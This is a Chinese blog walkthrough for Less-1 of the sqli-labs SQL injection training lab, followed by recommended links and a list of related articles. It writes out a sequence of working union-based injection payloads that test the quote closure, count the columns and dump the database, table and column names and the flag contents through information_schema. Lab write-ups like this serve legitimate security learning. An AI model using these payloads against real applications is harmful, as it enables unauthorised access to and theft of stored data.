在线sqli-labs 通关大全 Less-1
sqli-labs (1)
sqli-labs实验前:
本人因在sqli-labs搭建过程中遇到大量问题,百度后依旧无果,所以现决定在在线sqli-labs平台进行试验。
sqli-labs在线平台: http://43.247.91.228:84/
在线平台sqli-labs Page-1 点击Less-1可直接进行试验
一.知识点
1.FireFox插件HackBar使用
2.字符型注入:注意单引号闭合
3.sqlmap这里暂时不使用,想了解的可以自己尝试,刚开始手工注入扎扎实实打基础较好。
4.字符型注入判断
(1)判断注入
?id=1' and 1=1 --+ 返回正确
?id=1' and 1=2 --+ 返回错误
(2)猜字段
?id=1' order by 2 --+ 返回正确
?id=1' order by 3 --+ 返回错误 得出字段数为 2下面为测试空格字符代替情况 (可跳过)?id=1' order by 2 -- - 返回正确
?id=1' order by 2 -- / 返回正确
(3)爆数据库名
?id=1' and 1=2 union select 1,database()--+
得到数据库sqli
(4)爆表名
?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+
(5)爆列名
?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+
(6)爆字段内容(flag)
?id=1' and 1=2 union select 1,group_concat(flag) from sqli.flag--+
二.题解
注:以下解题步骤大多以图片显示不再做过多解释
字段为3的时候显示正常,字段为4时显示错误,所以最终字段为3
数据库名为security
因为第二步爆出有3个字段,所以select后面要跟3个字段,下面这张图片为跟了两个字段时的情形会显示错误
爆出的表名有四个:emails,referers,uagents,users
上面四个表名中uagents,users两个表名最可疑,经过尝试在users表中得到了payload如下图
总结:字符型注入可以按照以上六步进行手工尝试最后得到payload
推荐:最后给大家推荐几个sql或者其他漏洞学习方面不错的网站
sql整数型/字符型注入: https://www.cnblogs.com/threesoil/p/12431496.html
ctf wiki: https://ctf-wiki.github.io/ctf-wiki/web/sqli-zh/
狼组知识库web方面: https://wiki.wgpsec.org/knowledge/web/
ctfhub sql注入wp: https://www.cnblogs.com/0yst3r-2046/p/12469632.html(最后这个是来自ctfhub学习中偶然看到的一位不认识的大佬,ta的ctf wp都挺详细的大家也可以多做学习)
在线sqli-labs 通关大全 Less-1相关推荐
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- 在线常用crontab表达式大全验证解析
在线常用crontab表达式大全验证解析 在线常用crontab表达式大全验证解析 本工具可以在线模拟Crontab表达式的执行时间并且收集整理了常用的Crontab表达式. 本工具可以在线模拟Cro ...
- 【git小游戏通关大全】
前言: 最近为了弄懂git的使用和知识点,老师让我们在git小游戏Learn Git Branching多加练习,研究了好久游戏关总是突破不了,查看了很多资料和视频最终总结整理出一套完整的游戏闯关答案 ...
- 在线播放器代码大全!
在线播放器代码大全 1.avi格式 <object id="video" width="400" height="200" borde ...
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- 在线sqli-labs 通关大全 Less-2
sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期.--卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 conca ...
最新文章
- Bootstrap框架的基本使用
- Ubuntu使用小技巧
- 腾讯面试:打家劫舍 III
- 【VC基础】1、特性和分类
- C#装箱和拆箱(值类型和引用类型之间的转换)
- 看门狗寄存器c语言代码_「正点原子NANO STM32F103开发板资料连载」第十一章 看门狗实验...
- boost::hana::detail模块实现相关算法的测试程序
- java capacity_关于Java中StringBuffer的capacity问题
- 如何通过map文件优化代码
- Unit Testing with JUnit - Tutorial
- mac 读写ntfs
- html— Meta— http-equiv属性
- python中pd是什么意思_何时申请(pd.to_numeric)以及何时在python中使用...
- Android8 miui9使用,小米古董机刷完安卓8.0健步如飞!感觉比MIUI9还快
- python学习实验报告(第一周)
- npm install报错 npm ERR 的四种解决办法
- 将福昕高级PDF编辑器中创建的PDF签名导出,迁移到其他电脑并导入福昕PDF中
- Ubuntu16.04安装搜狗中文输入法1(安装完成后将英文输入法列为常用输入法,中文列为第二输入法)
- SEO的外链与描文本该如何添加?
- 求a100的值,an是一个集合{2^s+2^t且t>s>=0}程序验证
热门文章
- 你还在手写接口文档?来,壹哥教你一招实现在线接口文档
- BZOJ 4402: Claris的剑 (组合数学)
- 关于小米游戏本显示屏时亮时暗的问题
- Qt 仿QQ图片查看器
- How Powerful are Graph Neural Networks? GIN 图同构网络 ICLR 2019 论文详解
- Android4.0 默认静、动态桌面设置
- Console无界面程序如何使用SetTimer
- Oracle获取insert的值,在Oracle中,如何从AFTER INSERT触发器获取插入的主键值?
- php html5日期插件,基于jQuery和HTML5的日历时钟插件 的图文详解
- 学习实战篇---通用卷积神经网络加速器的verilog实现(一)---axi-lite实验